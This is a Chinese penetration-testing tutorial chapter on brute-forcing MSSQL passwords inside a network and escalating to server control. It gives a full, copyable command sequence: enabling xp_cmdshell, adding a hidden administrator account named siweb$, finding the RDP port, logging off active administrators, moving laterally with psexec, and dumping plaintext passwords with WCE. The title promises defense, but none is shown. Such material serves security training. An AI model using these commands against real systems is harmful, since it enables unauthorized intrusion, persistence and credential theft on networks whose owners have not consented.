sqlmap从入门到精通-第五章-5-6 内网与外网MSSQL口

5.6 内网与外网MSSQL口令扫描渗透与防御

地址：https://cloud.tencent.com/developer/article/1041295

本节内容不多，作者也是把本章节的内容发表到互联网上去了，主要讲的都是关于工具的使用，和在工具基础之上使用一些常用的渗透命令，其中大部分在前面的章节也演示过，所以大家一定要多练习，多排练几遍，才能变成自己的东西，有任何问题，欢迎关注微信私聊，一起探讨。

在实际渗透过程中，往往通过SQL注入或者弱口令登录后台，成功获取了Webshell,但对于如何进行内网渗透相当纠结，其实在获取入口权限的情况下，通过lcx端口转发等工具，进入内网，可以通过数据库、系统账号等口令扫描来实施内网渗透。本文就介绍如何在内网中进行MSSQL口令扫描及获取服务器权限。

5.6.1 使用SQLPing扫描获取MSSQL口令

在SQLPing程序目录，配置好passlist.txt和userlist.txt文件，如图1所示，设置扫描的IP地址及其范围，本案例是针对内网开始地址192.100.100.1，终止地址为192.100.100.254。在实际渗透测试中根据实际需要来设置扫描的IP地址，User list也是根据实际掌握情况来设置，比较常用的用户为sa。Passwordlist根据实际收集的密码来进行扫描，如果是普通密码破解，则可以使用top10000password这种字典，在内网中可以逐渐加强该字典，将收集到的所有用户密码全部加入。

5.6.2 扫描破解密码

扫描并破解密码如图2所示，对192.100.100.X的C段地址进行扫描，成功发现16个MSSQL实例，且暴力破解成功5个账号，红色字体表示破解成功。单击“File”菜单，可以将扫描结果保存为xml文件，然后打开文件进行查看，如图3所示。

5.6.3 使用SQLTOOLS进行提权

1. 连接测试

在SQL连接设置中分别填入IP地址“192.100.100.33”，密码“lo*******”,如图4所示，单击连接，如果密码正确则会提示连接成功，然后执行”dir c:\”命令来测试是否可以执行DOS命令。

2. 查看数据库版本

在SQL命令中执行“select @@version”命令，如图5所示，获取当前数据库为SQLServer2005.

3. 恢复xp_cmdshell存储过程

在SQLTools中分别执行以下语句来恢复xp_cmdshell存储过程

EXEC sp_configure 'show advanced options', 1;

RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

4. 获取当前权限

在DOS命令中执行“whoami”命令获取当前用户权限为系统权限（nt authority\system）

5. 添加管理员用户到管理组

在DOS命令中分别执行以下语句

net user siweb$ siweb /add

net localgroup administrators siweb$ /add

net localgroup administrators

来添加用户siweb$密码为siweb，并将siweb$用户添加到管理员组，最后查看管理员组用户siweb$是否添加成功

6. 获取远程终端端口

远程终端默认端口是3389，有些情况下，无法直接端口进行扫描，则可以通过命令行来快速获取：

tasklist /svc | find "Term" 或者tasklist /svc | find "TermService"

显示结果其中7100表示进程号，TermService表示远程终端服务。

netstat -ano | find "7100"则表示获取进程号为7100的端口号

7. 查看当前远程终端用户登录情况

可以使用queryuser/quser等命令来查看当前3389连接情况，防止发生管理员在线情况下登入服务器！使用logoff ID注销当前登录的用户。例如注销管理员显示为唱片的用户，则可以使用“logoff1”命令。

8. 使用psexec配合WCE来获取密码

net use \\192.100.100.33\admin$ “siweb” /user:siweb$

psexec \\192.100.100.33 cmd

成功进行交互式命令提示符。

9. 获取当前系统架构

执行systeminfo | find "86"获取信息中会显示Family等字样，如图15所示，则表明该操作系统是X86系统，否则使用systeminfo | find "64"命令来获取该架构为X64架构，然后使用对应的wce等密码获取程序来获取明文或者加密的哈希值。

5.6.4 登录远程终端

使用获取的密码Administrator/!XML********登录192.100.100.33服务器，如图16所示成功获取内网中一台服务器权限。

5.6.5 总结与提高

(1) 口令扫描，可以通过sqlping等工具对内网IP进行扫描，获取sa口令

(2) 查看服务器版本，对SQLServer2005可恢复其存储进程：EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

(3) 对SQLServer2000/2005可以查看其当前用户权限，执行whomai，如果是管理员权限，则可以通过添加用户来获取服务器权限。

net user siweb$ siweb /add

net localgroup administrators siweb$ /add

net localgroup administrators

(4) 精确获取远程终端端口命令：tasklist /svc | find "Term"

tasklist /svc | find "Term"

svchost.exe  7100 TermService

netstat -ano | find "7100"

(5) 获取操作系统架构，便于使用合适的密码获取软件获取明文密码

systeminfo | find "86"

systeminfo | find "64"

(6) 明文密码获取

wce -w

密码hash快速破解，可以通过ophcrack在线破解网站进行破解